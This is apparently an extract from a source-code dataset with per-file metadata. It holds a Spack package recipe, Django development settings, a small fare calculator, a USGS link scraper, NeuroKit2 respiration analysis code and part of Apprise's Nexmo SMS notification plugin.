copy('arch.make.sample', 'arch.make')
@property
def build_targets(self):
return ['XMLF90_ROOT=%s' % self.spec['xmlf90'].prefix,
'GRIDXC_ROOT=%s' % self.spec['libgridxc'].prefix,
'FC=fc']
def install(self, spec, prefix):
mkdir(prefix.bin)
install('atm', prefix.bin)
| 30.636364
| 94
| 0.664688
|
from spack import *
class AtomDft(MakefilePackage):
homepage = "https://departments.icmab.es/leem/siesta/Pseudopotentials/"
url = "https://departments.icmab.es/leem/siesta/Pseudopotentials/Code/atom-4.2.6.tgz"
version('4.2.6', 'c0c80cf349f951601942ed6c7cb0256b')
depends_on('libgridxc')
depends_on('xmlf90')
def edit(self, spec, prefix):
copy('arch.make.sample', 'arch.make')
@property
def build_targets(self):
return ['XMLF90_ROOT=%s' % self.spec['xmlf90'].prefix,
'GRIDXC_ROOT=%s' % self.spec['libgridxc'].prefix,
'FC=fc']
def install(self, spec, prefix):
mkdir(prefix.bin)
install('atm', prefix.bin)
| true
| true
|
1c42387b1ebfe6056c5b893f540ce5c174057639
| 4,234
|
py
|
Python
|
todo_django/todo_django/settings.py
|
danjac/todo-djember
|
7fcfc644c73b702ae9e18a9a27bea0b075fea187
|
[
"MIT"
] | 2
|
2016-12-08T11:24:54.000Z
|
2017-03-18T04:36:35.000Z
|
todo_django/todo_django/settings.py
|
danjac/todo-djember
|
7fcfc644c73b702ae9e18a9a27bea0b075fea187
|
[
"MIT"
] | null | null | null |
todo_django/todo_django/settings.py
|
danjac/todo-djember
|
7fcfc644c73b702ae9e18a9a27bea0b075fea187
|
[
"MIT"
] | null | null | null |
"""
Django settings for todo_django project.
Generated by 'django-admin startproject' using Django 1.9.5.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.9/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'ry%8!dfeiilht!0!da0h29!y4tnnzu8qe6%79bsy4i(_nb%k(u'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'corsheaders',
'rest_framework',
'rest_framework.authtoken',
'rest_framework_json_api',
'todo',
]
MIDDLEWARE_CLASSES = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'corsheaders.middleware.CorsMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'todo_django.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'todo_django.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.9/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.9/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.9/howto/static-files/
STATIC_URL = '/static/'
# Development only
CORS_ORIGIN_ALLOW_ALL = True
REST_FRAMEWORK = {
'DEFAULT_AUTHENTICATION_CLASSES': (
'rest_framework.authentication.TokenAuthentication',
'rest_framework.authentication.SessionAuthentication',
),
'PAGE_SIZE': 10,
'EXCEPTION_HANDLER': 'rest_framework_json_api.exceptions.exception_handler',
'DEFAULT_PAGINATION_CLASS':
'rest_framework_json_api.pagination.PageNumberPagination',
'DEFAULT_PARSER_CLASSES': (
'rest_framework_json_api.parsers.JSONParser',
'rest_framework.parsers.FormParser',
'rest_framework.parsers.MultiPartParser'
),
'DEFAULT_RENDERER_CLASSES': (
'rest_framework_json_api.renderers.JSONRenderer',
'rest_framework.renderers.BrowsableAPIRenderer',
),
'DEFAULT_METADATA_CLASS': 'rest_framework_json_api.metadata.JSONAPIMetadata',
}
#APPEND_SLASH = False
| 27.316129
| 91
| 0.709258
|
import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
SECRET_KEY = 'ry%8!dfeiilht!0!da0h29!y4tnnzu8qe6%79bsy4i(_nb%k(u'
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'corsheaders',
'rest_framework',
'rest_framework.authtoken',
'rest_framework_json_api',
'todo',
]
MIDDLEWARE_CLASSES = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'corsheaders.middleware.CorsMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'todo_django.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'todo_django.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.9/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.9/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.9/howto/static-files/
STATIC_URL = '/static/'
# Development only
CORS_ORIGIN_ALLOW_ALL = True
REST_FRAMEWORK = {
'DEFAULT_AUTHENTICATION_CLASSES': (
'rest_framework.authentication.TokenAuthentication',
'rest_framework.authentication.SessionAuthentication',
),
'PAGE_SIZE': 10,
'EXCEPTION_HANDLER': 'rest_framework_json_api.exceptions.exception_handler',
'DEFAULT_PAGINATION_CLASS':
'rest_framework_json_api.pagination.PageNumberPagination',
'DEFAULT_PARSER_CLASSES': (
'rest_framework_json_api.parsers.JSONParser',
'rest_framework.parsers.FormParser',
'rest_framework.parsers.MultiPartParser'
),
'DEFAULT_RENDERER_CLASSES': (
'rest_framework_json_api.renderers.JSONRenderer',
'rest_framework.renderers.BrowsableAPIRenderer',
),
'DEFAULT_METADATA_CLASS': 'rest_framework_json_api.metadata.JSONAPIMetadata',
}
#APPEND_SLASH = False
| true
| true
|
1c4239313b0fb16df0db4b986bf039eafabbb42e
| 217
|
py
|
Python
|
Pacote download/Exercicios/custo da viagem.py
|
Henrique-GM/Exercicios_de_Python
|
8cbbcaa31fc19e467576ab21ba3458d67052c40b
|
[
"Unlicense"
] | null | null | null |
Pacote download/Exercicios/custo da viagem.py
|
Henrique-GM/Exercicios_de_Python
|
8cbbcaa31fc19e467576ab21ba3458d67052c40b
|
[
"Unlicense"
] | null | null | null |
Pacote download/Exercicios/custo da viagem.py
|
Henrique-GM/Exercicios_de_Python
|
8cbbcaa31fc19e467576ab21ba3458d67052c40b
|
[
"Unlicense"
] | null | null | null |
viagem = float(input('Enter the trip distance in km: '))
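# Fare rule: 0.50 per km for trips of up to 200 km, otherwise 0.45 per km for the whole distance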
if viagem <= 200:
    print('The fare charged will be: {:.2f}$'.format(viagem * 0.50))
else:
    print('The fare charged will be: {:.2f}$'.format(viagem * 0.45))
| 31
| 64
| 0.631336
|
viagem = float(input('Enter the trip distance in km: '))
if viagem <= 200:
    print('The fare charged will be: {:.2f}$'.format(viagem * 0.50))
else:
    print('The fare charged will be: {:.2f}$'.format(viagem * 0.45))
| true
| true
|
1c42399e0db35b1c24761a4d2384b6a7728a5989
| 588
|
py
|
Python
|
bin/get_data_urls.py
|
peterhil/ninhursag
|
582133ae51e98b2e4272d6a78794b08aed845960
|
[
"MIT"
] | 4
|
2015-05-24T20:39:54.000Z
|
2021-06-23T06:48:23.000Z
|
bin/get_data_urls.py
|
peterhil/ninhursag
|
582133ae51e98b2e4272d6a78794b08aed845960
|
[
"MIT"
] | 10
|
2021-03-23T01:11:49.000Z
|
2021-06-22T23:58:36.000Z
|
bin/get_data_urls.py
|
peterhil/ninhursag
|
582133ae51e98b2e4272d6a78794b08aed845960
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 mode: python -*-
import urllib.request
from bs4 import BeautifulSoup
url = 'https://www.usgs.gov/centers/nmic/historical-statistics-mineral-and-material-commodities-united-states'
with urllib.request.urlopen(url) as response:
page = response.read()
soup = BeautifulSoup(page, 'html.parser')
trs = soup.select('tr')
for tr in trs:
mineral = tr.select('td a[id]')
link = tr.select('td a[href*=".xlsx"]')
if mineral and link:
# print("\t".join([mineral[0].contents[0], link[0]['href']]))
print(link[0]['href'])
| 26.727273
| 110
| 0.659864
|
import urllib.request
from bs4 import BeautifulSoup
url = 'https://www.usgs.gov/centers/nmic/historical-statistics-mineral-and-material-commodities-united-states'
with urllib.request.urlopen(url) as response:
page = response.read()
soup = BeautifulSoup(page, 'html.parser')
trs = soup.select('tr')
for tr in trs:
mineral = tr.select('td a[id]')
link = tr.select('td a[href*=".xlsx"]')
if mineral and link:
print(link[0]['href'])
| true
| true
|
1c423aacb2531aad54f0c1359c050aa5b046564a
| 5,270
|
py
|
Python
|
neurokit2/rsp/rsp_eventrelated.py
|
aristotelisxs/NeuroKit
|
61c8c9b26ac7bc8ac5b666ce6cb1dfe59b1c146b
|
[
"MIT"
] | 1
|
2020-12-31T17:48:11.000Z
|
2020-12-31T17:48:11.000Z
|
neurokit2/rsp/rsp_eventrelated.py
|
aristotelisxs/NeuroKit
|
61c8c9b26ac7bc8ac5b666ce6cb1dfe59b1c146b
|
[
"MIT"
] | null | null | null |
neurokit2/rsp/rsp_eventrelated.py
|
aristotelisxs/NeuroKit
|
61c8c9b26ac7bc8ac5b666ce6cb1dfe59b1c146b
|
[
"MIT"
] | 1
|
2020-12-20T17:24:25.000Z
|
2020-12-20T17:24:25.000Z
|
# -*- coding: utf-8 -*-
from warnings import warn
import numpy as np
from ..epochs.eventrelated_utils import (
_eventrelated_addinfo,
_eventrelated_rate,
_eventrelated_sanitizeinput,
_eventrelated_sanitizeoutput,
)
from ..misc import NeuroKitWarning
def rsp_eventrelated(epochs, silent=False):
"""Performs event-related RSP analysis on epochs.
Parameters
----------
epochs : Union[dict, pd.DataFrame]
A dict containing one DataFrame per event/trial, usually obtained via `epochs_create()`,
or a DataFrame containing all epochs, usually obtained via `epochs_to_df()`.
silent : bool
If True, silence possible warnings.
Returns
-------
DataFrame
A dataframe containing the analyzed RSP features for each epoch,
with each epoch indicated by the `Label` column (if not
present, by the `Index` column). The analyzed features
consist of the following:
- *"RSP_Rate_Max"*: the maximum respiratory rate after stimulus onset.
- *"RSP_Rate_Min"*: the minimum respiratory rate after stimulus onset.
- *"RSP_Rate_Mean"*: the mean respiratory rate after stimulus onset.
- *"RSP_Rate_Max_Time"*: the time at which maximum respiratory rate occurs.
- *"RSP_Rate_Min_Time"*: the time at which minimum respiratory rate occurs.
- *"RSP_Amplitude_Max"*: the maximum respiratory amplitude after stimulus onset.
- *"RSP_Amplitude_Min"*: the minimum respiratory amplitude after stimulus onset.
- *"RSP_Amplitude_Mean"*: the mean respiratory amplitude after stimulus onset.
- *"RSP_Phase"*: indication of whether the onset of the event concurs with respiratory
inspiration (1) or expiration (0).
- *"RSP_PhaseCompletion"*: indication of the stage of the current respiration phase (0 to 1)
at the onset of the event.
See Also
--------
events_find, epochs_create, bio_process
Examples
----------
>>> import neurokit2 as nk
>>>
>>> # Example with simulated data
>>> rsp, info = nk.rsp_process(nk.rsp_simulate(duration=120))
>>> epochs = nk.epochs_create(rsp, events=[5000, 10000, 15000], epochs_start=-0.1, epochs_end=1.9)
>>>
>>> # Analyze
>>> rsp1 = nk.rsp_eventrelated(epochs)
>>> rsp1 #doctest: +SKIP
>>>
>>> # Example with real data
>>> data = nk.data("bio_eventrelated_100hz")
>>>
>>> # Process the data
>>> df, info = nk.bio_process(rsp=data["RSP"], sampling_rate=100)
>>> events = nk.events_find(data["Photosensor"], threshold_keep='below',
... event_conditions=["Negative", "Neutral", "Neutral", "Negative"])
>>> epochs = nk.epochs_create(df, events, sampling_rate=100, epochs_start=-0.1, epochs_end=2.9)
>>>
>>> # Analyze
>>> rsp2 = nk.rsp_eventrelated(epochs)
>>> rsp2 #doctest: +SKIP
"""
# Sanity checks
epochs = _eventrelated_sanitizeinput(epochs, what="rsp", silent=silent)
# Extract features and build dataframe
data = {} # Initialize an empty dict
for i in epochs.keys():
data[i] = {} # Initialize empty container
# Rate
data[i] = _eventrelated_rate(epochs[i], data[i], var="RSP_Rate")
# Amplitude
data[i] = _rsp_eventrelated_amplitude(epochs[i], data[i])
# Inspiration
data[i] = _rsp_eventrelated_inspiration(epochs[i], data[i])
# Fill with more info
data[i] = _eventrelated_addinfo(epochs[i], data[i])
df = _eventrelated_sanitizeoutput(data)
return df
# =============================================================================
# Internals
# =============================================================================
def _rsp_eventrelated_amplitude(epoch, output={}):
# Sanitize input
if "RSP_Amplitude" not in epoch:
warn(
"Input does not have an `RSP_Amplitude` column."
" Will skip all amplitude-related features.",
category=NeuroKitWarning
)
return output
# Get baseline
if np.min(epoch.index.values) <= 0:
baseline = epoch["RSP_Amplitude"][epoch.index <= 0].values
signal = epoch["RSP_Amplitude"][epoch.index > 0].values
else:
baseline = epoch["RSP_Amplitude"][np.min(epoch.index.values) : np.min(epoch.index.values)].values
signal = epoch["RSP_Amplitude"][epoch.index > np.min(epoch.index)].values
# Max / Min / Mean
output["RSP_Amplitude_Max"] = np.max(signal) - np.mean(baseline)
output["RSP_Amplitude_Min"] = np.min(signal) - np.mean(baseline)
output["RSP_Amplitude_Mean"] = np.mean(signal) - np.mean(baseline)
return output
def _rsp_eventrelated_inspiration(epoch, output={}):
# Sanitize input
if "RSP_Phase" not in epoch:
warn(
"Input does not have an `RSP_Phase` column."
" Will not indicate whether event onset concurs with inspiration.",
category=NeuroKitWarning
)
return output
# Indication of inspiration
output["RSP_Phase"] = epoch["RSP_Phase"][epoch.index > 0].iloc[0]
output["RSP_Phase_Completion"] = epoch["RSP_Phase_Completion"][epoch.index > 0].iloc[0]
return output
| 35.133333
| 105
| 0.627135
|
from warnings import warn
import numpy as np
from ..epochs.eventrelated_utils import (
_eventrelated_addinfo,
_eventrelated_rate,
_eventrelated_sanitizeinput,
_eventrelated_sanitizeoutput,
)
from ..misc import NeuroKitWarning
def rsp_eventrelated(epochs, silent=False):
epochs = _eventrelated_sanitizeinput(epochs, what="rsp", silent=silent)
data = {}
for i in epochs.keys():
data[i] = {}
data[i] = _eventrelated_rate(epochs[i], data[i], var="RSP_Rate")
data[i] = _rsp_eventrelated_amplitude(epochs[i], data[i])
data[i] = _rsp_eventrelated_inspiration(epochs[i], data[i])
data[i] = _eventrelated_addinfo(epochs[i], data[i])
df = _eventrelated_sanitizeoutput(data)
return df
def _rsp_eventrelated_amplitude(epoch, output={}):
if "RSP_Amplitude" not in epoch:
warn(
"Input does not have an `RSP_Amplitude` column."
" Will skip all amplitude-related features.",
category=NeuroKitWarning
)
return output
if np.min(epoch.index.values) <= 0:
baseline = epoch["RSP_Amplitude"][epoch.index <= 0].values
signal = epoch["RSP_Amplitude"][epoch.index > 0].values
else:
baseline = epoch["RSP_Amplitude"][np.min(epoch.index.values) : np.min(epoch.index.values)].values
signal = epoch["RSP_Amplitude"][epoch.index > np.min(epoch.index)].values
output["RSP_Amplitude_Max"] = np.max(signal) - np.mean(baseline)
output["RSP_Amplitude_Min"] = np.min(signal) - np.mean(baseline)
output["RSP_Amplitude_Mean"] = np.mean(signal) - np.mean(baseline)
return output
def _rsp_eventrelated_inspiration(epoch, output={}):
if "RSP_Phase" not in epoch:
warn(
"Input does not have an `RSP_Phase` column."
" Will not indicate whether event onset concurs with inspiration.",
category=NeuroKitWarning
)
return output
output["RSP_Phase"] = epoch["RSP_Phase"][epoch.index > 0].iloc[0]
output["RSP_Phase_Completion"] = epoch["RSP_Phase_Completion"][epoch.index > 0].iloc[0]
return output
| true
| true
|
1c423aad6f7ea469c32c1c28202143fc23d66473
| 12,918
|
py
|
Python
|
apprise/plugins/NotifyNexmo.py
|
linkmauve/apprise
|
76700bfa1ddcb2812d9ed14dfa7736125bcd346e
|
[
"MIT"
] | 4,764
|
2018-02-02T18:17:06.000Z
|
2022-03-31T20:41:13.000Z
|
apprise/plugins/NotifyNexmo.py
|
linkmauve/apprise
|
76700bfa1ddcb2812d9ed14dfa7736125bcd346e
|
[
"MIT"
] | 504
|
2017-11-26T15:56:14.000Z
|
2022-03-31T22:38:49.000Z
|
apprise/plugins/NotifyNexmo.py
|
linkmauve/apprise
|
76700bfa1ddcb2812d9ed14dfa7736125bcd346e
|
[
"MIT"
] | 217
|
2018-05-22T14:29:20.000Z
|
2022-03-28T06:24:46.000Z
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2019 Chris Caron <lead2gold@gmail.com>
# All rights reserved.
#
# This code is licensed under the MIT License.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files(the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and / or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions :
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
# Sign-up with https://dashboard.nexmo.com/
#
# Get your (api) key and secret here:
# - https://dashboard.nexmo.com/getting-started-guide
#
import requests
from .NotifyBase import NotifyBase
from ..URLBase import PrivacyMode
from ..common import NotifyType
from ..utils import is_phone_no
from ..utils import parse_phone_no
from ..utils import validate_regex
from ..AppriseLocale import gettext_lazy as _
class NotifyNexmo(NotifyBase):
"""
A wrapper for Nexmo Notifications
"""
# The default descriptive name associated with the Notification
service_name = 'Nexmo'
# The services URL
service_url = 'https://dashboard.nexmo.com/'
# The default protocol
secure_protocol = 'nexmo'
# A URL that takes you to the setup/help of the specific protocol
setup_url = 'https://github.com/caronc/apprise/wiki/Notify_nexmo'
# Nexmo uses the http protocol with JSON requests
notify_url = 'https://rest.nexmo.com/sms/json'
# The maximum length of the body
body_maxlen = 160
# A title can not be used for SMS Messages. Setting this to zero will
# cause any title (if defined) to get placed into the message body.
title_maxlen = 0
# Define object templates
templates = (
'{schema}://{apikey}:{secret}@{from_phone}',
'{schema}://{apikey}:{secret}@{from_phone}/{targets}',
)
# Define our template tokens
template_tokens = dict(NotifyBase.template_tokens, **{
'apikey': {
'name': _('API Key'),
'type': 'string',
'required': True,
'regex': (r'^[a-z0-9]+$', 'i'),
'private': True,
},
'secret': {
'name': _('API Secret'),
'type': 'string',
'private': True,
'required': True,
'regex': (r'^[a-z0-9]+$', 'i'),
},
'from_phone': {
'name': _('From Phone No'),
'type': 'string',
'required': True,
'regex': (r'^\+?[0-9\s)(+-]+$', 'i'),
'map_to': 'source',
},
'target_phone': {
'name': _('Target Phone No'),
'type': 'string',
'prefix': '+',
'regex': (r'^[0-9\s)(+-]+$', 'i'),
'map_to': 'targets',
},
'targets': {
'name': _('Targets'),
'type': 'list:string',
},
})
# Define our template arguments
template_args = dict(NotifyBase.template_args, **{
'to': {
'alias_of': 'targets',
},
'from': {
'alias_of': 'from_phone',
},
'key': {
'alias_of': 'apikey',
},
'secret': {
'alias_of': 'secret',
},
# Default Time To Live
# By default Nexmo attempt delivery for 72 hours, however the maximum
# effective value depends on the operator and is typically 24 - 48
# hours. We recommend this value should be kept at its default or at
# least 30 minutes.
'ttl': {
'name': _('ttl'),
'type': 'int',
'default': 900000,
'min': 20000,
'max': 604800000,
},
})
def __init__(self, apikey, secret, source, targets=None, ttl=None,
**kwargs):
"""
Initialize Nexmo Object
"""
super(NotifyNexmo, self).__init__(**kwargs)
# API Key (associated with project)
self.apikey = validate_regex(
apikey, *self.template_tokens['apikey']['regex'])
if not self.apikey:
msg = 'An invalid Nexmo API Key ' \
'({}) was specified.'.format(apikey)
self.logger.warning(msg)
raise TypeError(msg)
# API Secret (associated with project)
self.secret = validate_regex(
secret, *self.template_tokens['secret']['regex'])
if not self.secret:
msg = 'An invalid Nexmo API Secret ' \
'({}) was specified.'.format(secret)
self.logger.warning(msg)
raise TypeError(msg)
# Set our Time to Live Flag
self.ttl = self.template_args['ttl']['default']
try:
self.ttl = int(ttl)
except (ValueError, TypeError):
# Do nothing
pass
if self.ttl < self.template_args['ttl']['min'] or \
self.ttl > self.template_args['ttl']['max']:
msg = 'The Nexmo TTL specified ({}) is out of range.'\
.format(self.ttl)
self.logger.warning(msg)
raise TypeError(msg)
# The Source Phone #
self.source = source
result = is_phone_no(source)
if not result:
msg = 'The Account (From) Phone # specified ' \
'({}) is invalid.'.format(source)
self.logger.warning(msg)
raise TypeError(msg)
# Store our parsed value
self.source = result['full']
# Parse our targets
self.targets = list()
for target in parse_phone_no(targets):
# Validate targets and drop bad ones:
result = is_phone_no(target)
if not result:
self.logger.warning(
'Dropped invalid phone # '
'({}) specified.'.format(target),
)
continue
# store valid phone number
self.targets.append(result['full'])
return
def send(self, body, title='', notify_type=NotifyType.INFO, **kwargs):
"""
Perform Nexmo Notification
"""
# error tracking (used for function return)
has_error = False
# Prepare our headers
headers = {
'User-Agent': self.app_id,
'Content-Type': 'application/x-www-form-urlencoded',
}
# Prepare our payload
payload = {
'api_key': self.apikey,
'api_secret': self.secret,
'ttl': self.ttl,
'from': self.source,
'text': body,
# The to gets populated in the loop below
'to': None,
}
# Create a copy of the targets list
targets = list(self.targets)
if len(targets) == 0:
# No sources specified, use our own phone no
targets.append(self.source)
while len(targets):
# Get our target to notify
target = targets.pop(0)
# Prepare our user
payload['to'] = target
# Some Debug Logging
self.logger.debug('Nexmo POST URL: {} (cert_verify={})'.format(
self.notify_url, self.verify_certificate))
self.logger.debug('Nexmo Payload: {}' .format(payload))
# Always call throttle before any remote server i/o is made
self.throttle()
try:
r = requests.post(
self.notify_url,
data=payload,
headers=headers,
verify=self.verify_certificate,
timeout=self.request_timeout,
)
if r.status_code != requests.codes.ok:
# We had a problem
status_str = \
NotifyNexmo.http_response_code_lookup(
r.status_code)
self.logger.warning(
'Failed to send Nexmo notification to {}: '
'{}{}error={}.'.format(
target,
status_str,
', ' if status_str else '',
r.status_code))
self.logger.debug(
'Response Details:\r\n{}'.format(r.content))
# Mark our failure
has_error = True
continue
else:
self.logger.info('Sent Nexmo notification to %s.' % target)
except requests.RequestException as e:
self.logger.warning(
'A Connection error occurred sending Nexmo:%s '
'notification.' % target
)
self.logger.debug('Socket Exception: %s' % str(e))
# Mark our failure
has_error = True
continue
return not has_error
def url(self, privacy=False, *args, **kwargs):
"""
Returns the URL built dynamically based on specified arguments.
"""
# Define any URL parameters
params = {
'ttl': str(self.ttl),
}
# Extend our parameters
params.update(self.url_parameters(privacy=privacy, *args, **kwargs))
return '{schema}://{key}:{secret}@{source}/{targets}/?{params}'.format(
schema=self.secure_protocol,
key=self.pprint(self.apikey, privacy, safe=''),
secret=self.pprint(
self.secret, privacy, mode=PrivacyMode.Secret, safe=''),
source=NotifyNexmo.quote(self.source, safe=''),
targets='/'.join(
[NotifyNexmo.quote(x, safe='') for x in self.targets]),
params=NotifyNexmo.urlencode(params))
@staticmethod
def parse_url(url):
"""
Parses the URL and returns enough arguments that can allow
us to re-instantiate this object.
"""
results = NotifyBase.parse_url(url, verify_host=False)
if not results:
# We're done early as we couldn't load the results
return results
# Get our entries; split_path() looks after unquoting content for us
# by default
results['targets'] = NotifyNexmo.split_path(results['fullpath'])
# The hostname is our source number
results['source'] = NotifyNexmo.unquote(results['host'])
        # Get our API key and secret from the user/pass config
results['apikey'] = NotifyNexmo.unquote(results['user'])
results['secret'] = NotifyNexmo.unquote(results['password'])
# API Key
if 'key' in results['qsd'] and len(results['qsd']['key']):
# Extract the API Key from an argument
results['apikey'] = \
NotifyNexmo.unquote(results['qsd']['key'])
# API Secret
if 'secret' in results['qsd'] and len(results['qsd']['secret']):
# Extract the API Secret from an argument
results['secret'] = \
NotifyNexmo.unquote(results['qsd']['secret'])
# Support the 'from' and 'source' variable so that we can support
# targets this way too.
# The 'from' makes it easier to use yaml configuration
if 'from' in results['qsd'] and len(results['qsd']['from']):
results['source'] = \
NotifyNexmo.unquote(results['qsd']['from'])
if 'source' in results['qsd'] and len(results['qsd']['source']):
results['source'] = \
NotifyNexmo.unquote(results['qsd']['source'])
# Support the 'ttl' variable
if 'ttl' in results['qsd'] and len(results['qsd']['ttl']):
results['ttl'] = \
NotifyNexmo.unquote(results['qsd']['ttl'])
        # Support the 'to' variable so that we can support targets this way too
# The 'to' makes it easier to use yaml configuration
if 'to' in results['qsd'] and len(results['qsd']['to']):
results['targets'] += \
NotifyNexmo.parse_phone_no(results['qsd']['to'])
return results
| 33.466321
| 79
| 0.542963
|
import requests
from .NotifyBase import NotifyBase
from ..URLBase import PrivacyMode
from ..common import NotifyType
from ..utils import is_phone_no
from ..utils import parse_phone_no
from ..utils import validate_regex
from ..AppriseLocale import gettext_lazy as _
class NotifyNexmo(NotifyBase):
service_name = 'Nexmo'
service_url = 'https://dashboard.nexmo.com/'
secure_protocol = 'nexmo'
setup_url = 'https://github.com/caronc/apprise/wiki/Notify_nexmo'
notify_url = 'https://rest.nexmo.com/sms/json'
body_maxlen = 160
title_maxlen = 0
templates = (
'{schema}://{apikey}:{secret}@{from_phone}',
'{schema}://{apikey}:{secret}@{from_phone}/{targets}',
)
template_tokens = dict(NotifyBase.template_tokens, **{
'apikey': {
'name': _('API Key'),
'type': 'string',
'required': True,
'regex': (r'^[a-z0-9]+$', 'i'),
'private': True,
},
'secret': {
'name': _('API Secret'),
'type': 'string',
'private': True,
'required': True,
'regex': (r'^[a-z0-9]+$', 'i'),
},
'from_phone': {
'name': _('From Phone No'),
'type': 'string',
'required': True,
'regex': (r'^\+?[0-9\s)(+-]+$', 'i'),
'map_to': 'source',
},
'target_phone': {
'name': _('Target Phone No'),
'type': 'string',
'prefix': '+',
'regex': (r'^[0-9\s)(+-]+$', 'i'),
'map_to': 'targets',
},
'targets': {
'name': _('Targets'),
'type': 'list:string',
},
})
template_args = dict(NotifyBase.template_args, **{
'to': {
'alias_of': 'targets',
},
'from': {
'alias_of': 'from_phone',
},
'key': {
'alias_of': 'apikey',
},
'secret': {
'alias_of': 'secret',
},
'ttl': {
'name': _('ttl'),
'type': 'int',
'default': 900000,
'min': 20000,
'max': 604800000,
},
})
def __init__(self, apikey, secret, source, targets=None, ttl=None,
**kwargs):
super(NotifyNexmo, self).__init__(**kwargs)
self.apikey = validate_regex(
apikey, *self.template_tokens['apikey']['regex'])
if not self.apikey:
msg = 'An invalid Nexmo API Key ' \
'({}) was specified.'.format(apikey)
self.logger.warning(msg)
raise TypeError(msg)
self.secret = validate_regex(
secret, *self.template_tokens['secret']['regex'])
if not self.secret:
msg = 'An invalid Nexmo API Secret ' \
'({}) was specified.'.format(secret)
self.logger.warning(msg)
raise TypeError(msg)
self.ttl = self.template_args['ttl']['default']
try:
